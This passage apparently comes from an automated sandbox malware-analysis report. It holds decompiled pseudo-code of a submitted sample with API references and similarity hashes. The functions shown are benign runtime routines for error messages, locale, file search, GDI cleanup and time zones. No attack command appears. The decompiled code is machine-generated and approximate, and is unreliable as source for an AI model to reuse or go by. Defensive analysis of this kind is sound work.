                                                                                                                                                                                                                            				char _v264;
                                                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v264 = 0;
                                                                                                                                                                                                                            				_push(_t32);
                                                                                                                                                                                                                            				_push(0x426054);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t32 + 0xfffffefc;
                                                                                                                                                                                                                            				_t21 = GetLastError();
                                                                                                                                                                                                                            				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                                                                                                                                                                                                                            					E00425F64(_t22);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404C30( &_v264, 0x100,  &_v260);
                                                                                                                                                                                                                            					E0040D144(_v264, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t27);
                                                                                                                                                                                                                            				 *[fs:eax] = _t27;
                                                                                                                                                                                                                            				_push(0x42605b);
                                                                                                                                                                                                                            				return E004049C0( &_v264);
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00426054), ref: 00425FD8
                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426054), ref: 00425FFE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                            • Opcode ID: 7639f39f0f6971649c5501f16e778cfc29bd395630e8414492f684e078392d29
                                                                                                                                                                                                                            • Instruction ID: ab31158e8105cc555809865ed5eec4947da01a74a5557fb65747f91f9d9dccb4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7639f39f0f6971649c5501f16e778cfc29bd395630e8414492f684e078392d29
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6901FCB07043155BE731EB619D92BD6739CE758744F9200BBB744A61C1DBF86D40891D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 46%
                                                                                                                                                                                                                            			E0040E088(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                                                                            				char _v11;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t33 = __eflags;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_push(_t31);
                                                                                                                                                                                                                            				_push(0x40e0ec);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t31 + 0xfffffff4;
                                                                                                                                                                                                                            				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                                                                                                                                                                                                            				E00404C30( &_v16, 7,  &_v11);
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				E00409664(7, GetACP(), _t33);
                                                                                                                                                                                                                            				_pop(_t28);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				_push(E0040E0F3);
                                                                                                                                                                                                                            				return E004049C0( &_v16);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0AE
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0C7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                                                                                                                                                                                            • Instruction ID: 7c6682d932fdf235f30c9e422d46d0a378ce0b1a8e98ecff7cc19f77d6cd180e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0F671E08308ABEB00EBB2C85298EB3AEE7C4714F50C97AB110A36C1DA7C65018659
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B1C(void* __eax, WORD* __ecx, signed int __edx) {
                                                                                                                                                                                                                            				WORD* _t15;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				long _t22;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                            				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
                                                                                                                                                                                                                            				_t21 = FindFirstFileA(E00404E80(__eax), __ecx + 0x18);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
                                                                                                                                                                                                                            				if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                            					_t22 = GetLastError();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t22 = E00409AB8(_t15);
                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                            						E00409B90(_t15);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00473407,00000000,0047347E), ref: 00409B37
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,00473407,00000000,0047347E), ref: 00409B5C
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                              • Part of subcall function 00409B90: FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,?,?,00473407,00000000,0047347E), ref: 00409B9C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 976985129-0
                                                                                                                                                                                                                            • Opcode ID: 5173ca5de35eaf764c042a74d65f64b91b397c91c5c324bd22024a6cb50f54fd
                                                                                                                                                                                                                            • Instruction ID: 79fd7835e2b2924360e3ee9b5121bf30e16e58b6cc0e4d1406ffac342d6b08ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5173ca5de35eaf764c042a74d65f64b91b397c91c5c324bd22024a6cb50f54fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E03962F0122007C7156A7E688159A65DC6A85778349037FF914FB3C7D63CEC0643E9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E004601F0(intOrPtr* __eax) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                                                            				intOrPtr _v340;
                                                                                                                                                                                                                            				intOrPtr _v344;
                                                                                                                                                                                                                            				intOrPtr _v348;
                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                            				intOrPtr _v368;
                                                                                                                                                                                                                            				void* _v372;
                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                            				intOrPtr _v396;
                                                                                                                                                                                                                            				intOrPtr _v412;
                                                                                                                                                                                                                            				intOrPtr _v420;
                                                                                                                                                                                                                            				intOrPtr _v440;
                                                                                                                                                                                                                            				void* _v476;
                                                                                                                                                                                                                            				char _v484;
                                                                                                                                                                                                                            				intOrPtr _v488;
                                                                                                                                                                                                                            				char _v492;
                                                                                                                                                                                                                            				intOrPtr _v496;
                                                                                                                                                                                                                            				char _v668;
                                                                                                                                                                                                                            				char _v684;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                                                                            				signed int _t200;
                                                                                                                                                                                                                            				intOrPtr* _t237;
                                                                                                                                                                                                                            				char _t238;
                                                                                                                                                                                                                            				intOrPtr _t266;
                                                                                                                                                                                                                            				intOrPtr _t280;
                                                                                                                                                                                                                            				signed int _t293;
                                                                                                                                                                                                                            				void* _t294;
                                                                                                                                                                                                                            				void* _t297;
                                                                                                                                                                                                                            				void* _t299;
                                                                                                                                                                                                                            				intOrPtr _t300;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t297 = _t299;
                                                                                                                                                                                                                            				_t300 = _t299 + 0xfffffd58;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t126 =  *((intOrPtr*)(_v8 + 0x2c));
                                                                                                                                                                                                                            				_v12 = _t126;
                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                            					return _v12;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t303 = _t126;
                                                                                                                                                                                                                            					if(_t126 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x2c)) = E00429914(1);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(_v8 + 0x2c));
                                                                                                                                                                                                                            					_v17 = 1;
                                                                                                                                                                                                                            					E0045FA28(_v8,  &_v668, _t303);
                                                                                                                                                                                                                            					_push(_t297);
                                                                                                                                                                                                                            					_push(0x4605ea);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t300;
                                                                                                                                                                                                                            					_push(_t297);
                                                                                                                                                                                                                            					_push(0x4605bb);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t300;
                                                                                                                                                                                                                            					E0042AAE8( *((intOrPtr*)(_v8 + 0x2c)), 0);
                                                                                                                                                                                                                            					if( *((char*)(_v8 + 0x3e)) == 1) {
                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                            						E0042AE8C( *((intOrPtr*)(_v8 + 0x2c)), 3);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t305 = _v440 - 1;
                                                                                                                                                                                                                            						if(_v440 != 1) {
                                                                                                                                                                                                                            							E0042AE8C( *((intOrPtr*)(_v8 + 0x2c)), 6);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					E00419804(0, 0,  &_v684, 0);
                                                                                                                                                                                                                            					_push( &_v684);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t240 = 0;
                                                                                                                                                                                                                            					E00403DE8(_v8, _t305);
                                                                                                                                                                                                                            					_push(_t297);
                                                                                                                                                                                                                            					_push(0x4605aa);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t300;
                                                                                                                                                                                                                            					_t146 =  *(_v8 + 0x38);
                                                                                                                                                                                                                            					if(_t146 != 0) {
                                                                                                                                                                                                                            						_t280 = _v8;
                                                                                                                                                                                                                            						_t307 =  *((char*)(_t280 + 0x3e)) - 1;
                                                                                                                                                                                                                            						if( *((char*)(_t280 + 0x3e)) != 1) {
                                                                                                                                                                                                                            							DeleteObject(_t146);
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							 *(_v8 + 0x38) = 0;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00460168( &_v484, _t146);
                                                                                                                                                                                                                            							E004296A4( *(_v8 + 0x38));
                                                                                                                                                                                                                            							_t240 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))));
                                                                                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x38))();
                                                                                                                                                                                                                            							_v17 = 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E004622B8( &_v484, _t240);
                                                                                                                                                                                                                            					_t237 =  *((intOrPtr*)(_v8 + 0x2c));
                                                                                                                                                                                                                            					E0042AAE8(_t237, 0);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t237 + 0x40))();
                                                                                                                                                                                                                            					_t242 =  *_t237;
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t237 + 0x34))();
                                                                                                                                                                                                                            					_v16 = E0042A04C(_t237,  *_t237, 0, _t307);
                                                                                                                                                                                                                            					_t293 = E0042A04C(_t237,  *_t237, 1, _t307) - _v16;
                                                                                                                                                                                                                            					if(_t293 <= 0 || (_t293 & 0x00000003) != 0) {
                                                                                                                                                                                                                            						_t238 = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t238 = _v356;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_v420 != 0) {
                                                                                                                                                                                                                            						while(E00460E14( &_v484) != 2) {
                                                                                                                                                                                                                            							_v16 = E0042A04C( *((intOrPtr*)(_v8 + 0x2c)), _t242, 0, __eflags);
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								__eflags = _v344 - _v368;
                                                                                                                                                                                                                            								if(_v344 >= _v368) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t242 = _t238;
                                                                                                                                                                                                                            								_t200 = E00462440( &_v484, _t238,  &_v16);
                                                                                                                                                                                                                            								_t72 =  &_v16;
                                                                                                                                                                                                                            								 *_t72 = _v16 + _t293 * _t200;
                                                                                                                                                                                                                            								__eflags =  *_t72;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E004625DC( &_v484);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v412 = _v496;
                                                                                                                                                                                                                            						_v396 = _v488;
                                                                                                                                                                                                                            						if(_v492 != 0) {
                                                                                                                                                                                                                            							_v392 = 0xffffffff;
                                                                                                                                                                                                                            							_v348 = 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E0046257C( &_v484, _v340);
                                                                                                                                                                                                                            						_v16 = E0042A04C( *((intOrPtr*)(_v8 + 0x2c)), _t242, 0, 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_v420 == 0 || _v492 != 0) {
                                                                                                                                                                                                                            						if(_v348 != 0) {
                                                                                                                                                                                                                            							_t318 = _v17;
                                                                                                                                                                                                                            							if(_v17 != 0) {
                                                                                                                                                                                                                            								E004600C0( &_v484);
                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x38))();
                                                                                                                                                                                                                            								 *((char*)(_v8 + 0x22)) = 1;
                                                                                                                                                                                                                            								_v16 = E0042A04C( *((intOrPtr*)(_v8 + 0x2c)),  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))), 0, _t318);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					while(_v344 < _v368) {
                                                                                                                                                                                                                            						_t162 = E00462440( &_v484, _t238,  &_v16);
                                                                                                                                                                                                                            						_t105 =  &_v16;
                                                                                                                                                                                                                            						 *_t105 = _v16 + _t293 * _t162;
                                                                                                                                                                                                                            						__eflags =  *_t105;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_v420 != 0) {
                                                                                                                                                                                                                            						E004625DC( &_v484);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00460F28( &_v484);
                                                                                                                                                                                                                            					_pop(_t266);
                                                                                                                                                                                                                            					 *[fs:eax] = _t266;
                                                                                                                                                                                                                            					_push(0x4605b1);
                                                                                                                                                                                                                            					_t166 = E004027EC();
                                                                                                                                                                                                                            					_t321 = _t166;
                                                                                                                                                                                                                            					if(_t166 != 0) {
                                                                                                                                                                                                                            						_t294 = 0;
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t294 = 0x64;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t294);
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_v8 + 0x22)));
                                                                                                                                                                                                                            					E00419804(0, 0,  &_v684, 0);
                                                                                                                                                                                                                            					_push( &_v684);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					E00403DE8(_v8, _t321);
                                                                                                                                                                                                                            					_t176 = _v8;
                                                                                                                                                                                                                            					if( *((char*)(_t176 + 0x22)) != 0) {
                                                                                                                                                                                                                            						return  *((intOrPtr*)( *_v8 + 0x10))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t176;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0042AE8C: DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00460319
                                                                                                                                                                                                                              • Part of subcall function 004600C0: 73C9A8F0.GDI32(?,?,?,004604D3), ref: 00460159
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1531683806-0
                                                                                                                                                                                                                            • Opcode ID: f5af9fd06688819dce01de8b5de30438dcb52270282adaa96d37c89a3f1fecb9
                                                                                                                                                                                                                            • Instruction ID: 81a91d6be25e83a18400d4f463c807b98174f46c4b7671c237d37da0e720cfd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5af9fd06688819dce01de8b5de30438dcb52270282adaa96d37c89a3f1fecb9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57C15C30A00118EFDB60DB69C984BDEB7F5AF49304F5081EAE805A7351EB789E85CF46
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E0047E020(signed int __ebx, void* __ecx, void* __esi, long long __fp0) {
                                                                                                                                                                                                                            				long long _v12;
                                                                                                                                                                                                                            				struct _TIME_ZONE_INFORMATION _v184;
                                                                                                                                                                                                                            				char _v188;
                                                                                                                                                                                                                            				char _v192;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				long long _t86;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t86 = __fp0;
                                                                                                                                                                                                                            				_t55 = __ebx;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v192 = 0;
                                                                                                                                                                                                                            				_v188 = 0;
                                                                                                                                                                                                                            				_push(_t78);
                                                                                                                                                                                                                            				_push(0x47e133);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t78 + 0xffffff44;
                                                                                                                                                                                                                            				_t29 = GetTimeZoneInformation( &_v184) - 0xffffffff;
                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                            					_t30 =  *0x49dde0; // 0x47a56c
                                                                                                                                                                                                                            					E00406A70(_t30,  &_v188);
                                                                                                                                                                                                                            					_t66 = 1;
                                                                                                                                                                                                                            					E0040D144(_v188, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t48 = _t29 - 1;
                                                                                                                                                                                                                            					if(_t48 == 0) {
                                                                                                                                                                                                                            						_t55 = _v184.Bias;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t49 = _t48 - 1;
                                                                                                                                                                                                                            						if(_t49 == 0) {
                                                                                                                                                                                                                            							_t55 = _v184.Bias + _v184.StandardBias;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t83 = _t49 == 1;
                                                                                                                                                                                                                            							if(_t49 == 1) {
                                                                                                                                                                                                                            								_t55 = _v184.Bias + _v184.DaylightBias;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t51 =  *0x49dde0; // 0x47a56c
                                                                                                                                                                                                                            								E00406A70(_t51,  &_v192);
                                                                                                                                                                                                                            								_t66 = 1;
                                                                                                                                                                                                                            								E0040D144(_v192, 1);
                                                                                                                                                                                                                            								E00404378();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_t60 = (_t55 ^ _t66) - _t66;
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_push(((_t55 ^ _t66) - _t66) % 0x3c);
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_pop(_t70);
                                                                                                                                                                                                                            				E0040AF70(_t60 / 0x3c, 0, _t70, _t83, _t86);
                                                                                                                                                                                                                            				_v12 = _t86;
                                                                                                                                                                                                                            				asm("wait");
                                                                                                                                                                                                                            				if(_t55 > 0) {
                                                                                                                                                                                                                            					_v12 =  *0x47e144 - _v12;
                                                                                                                                                                                                                            					asm("wait");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t71);
                                                                                                                                                                                                                            				 *[fs:eax] = _t71;
                                                                                                                                                                                                                            				_push(0x47e13a);
                                                                                                                                                                                                                            				return E004049E4( &_v192, 2);
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            0x0047e0e6
                                                                                                                                                                                                                            0x0047e0e9
                                                                                                                                                                                                                            0x0047e0f5
                                                                                                                                                                                                                            0x0047e0fa
                                                                                                                                                                                                                            0x0047e0fb
                                                                                                                                                                                                                            0x0047e100
                                                                                                                                                                                                                            0x0047e103
                                                                                                                                                                                                                            0x0047e106
                                                                                                                                                                                                                            0x0047e111
                                                                                                                                                                                                                            0x0047e114
                                                                                                                                                                                                                            0x0047e114
                                                                                                                                                                                                                            0x0047e117
                                                                                                                                                                                                                            0x0047e11a
                                                                                                                                                                                                                            0x0047e11d
                                                                                                                                                                                                                            0x0047e132

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0047E133,?,?,?,?,0047DC8D,?,00000000,0047DCD5), ref: 0047E04E
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InformationLoadStringTimeZone
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2315373741-0
                                                                                                                                                                                                                            • Opcode ID: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                                                                                                                                                                                            • Instruction ID: c8d3901693a79c185cc961f03ab4e0d83d179c54252409d0c18e91a2dd9ec5b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A318670B043148BD714DF26DC81BA9B776EB48304F0482FAE50DE3291DB799D54CB1A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409ED2(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                            				CHAR* _t25;
                                                                                                                                                                                                                            				int _t26;
                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t25 = _a4;
                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                            					_t25 = 0;
                                                                                                                                                                                                                            				}
